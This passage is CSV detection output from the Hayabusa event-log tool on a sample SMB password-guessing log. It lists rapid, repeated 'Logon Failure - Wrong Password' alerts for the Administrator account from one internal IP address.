+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PSXqaP0i1eeKQOmX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gke4vfzIAC3k0yXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZnjxfeIX4ra6vmBA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ChR30FLLOT3Pvapv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VkepVf00vkpVp9yV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5i2AxYxwCX6DvP3M | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j8Fvcw2mQBI61mxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eAazyOpBig2G3Z78 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o1g3rjPQQAXEK2yz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BC68zrAEF6L00xS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8xD2aZArxVdrO6fG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.392 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHJN2mJgwQEZhXBG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: untyxmsmYrfRlHcu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eOc2R5V6p9VBsYI2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V5Ld2NDMjbY3tiT7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ykdbglaCU82nRvk5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tDGrsVIC5qVEwC6i | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UouNQa3EkcsMICiO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u0exIftdu0qPLrRC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q5mMNIdJj0BItrv6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pb2cVBffdBlwwGQP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p2FbHoSFFdnM4wH7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.917 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RAbCN4xKDDlhmrkU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pxBwuSDdNZlE2F96 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M3JkwIQF7yV42rOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6QiHHeHeY8yWOiJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rhzpo2bEgpJCB51w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AuyPyMMT4wQhLIEz | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: no5bOZf3SEsrETun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vBTHVleOipnyVFIY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JNFE2jNifGI7pELk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LgkAKJ57rYqCdbew | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: daKQcllU63lW4ypy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.426 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GBSPSAoEBS7JRYuf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94bI5pb8CGjY3QZD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w1obedLuMFlHlSvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EPn1yJV358YAFALV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qA7N5DMAJqNYkumM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Lk95NYGG5iLBFBw | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x3DDtXECsK61pIYy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rt8bfBDTV5wYfBO4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uTYMgN5kmFpyj7xN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RmyF6j61wosCE0sg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fd61fJBRizl2AIGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.924 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDIFX7lsmGqSGvkA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UVmto6S25gU2bkwa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7QMbzSuGuzzMK0v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJUynF5bN1Oj0vaP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dg4ZtybY5BnPN0nX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gRmRV9ct3hor8Muk | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QRjaP1mj9FgKsGBE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3CCzzatQ195mcxQ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QJPIrtk5GBAhsUlR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 720RHwyXQcxvsJBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GofmHRstuhljMDOL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.649 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wQUQ4INktwXwRkaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8WHs5hduf7SmUcLK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gdo1txjJXiRLbUDH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JK8jP3ftKQOyutGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdbEjo88dBJRhrKp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZCVkXkwhbuSM654 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z2mc9WScfBa88rtO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lee7qYLkXQoz8rRh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f5g1ZKpZuZU1WRoC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h4ST7RrHJxAQHHbn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GtW1hBHF97YqvN4N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.189 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVKlPytPofO9LQBm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GOkZ9yjvfL51UYXo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fAxfxSbRqGO7Dej0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D7XmvDYk6zFLir09 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mWcl6CKdSMxd8edZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SxBQlFZvGBqDdobn | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AXN94VanwME6q8rc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOj7CZ3stJXePY8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXjmqxguFGL3f8cV | IP Addr: 192.168.198.149 | AuthPackage: 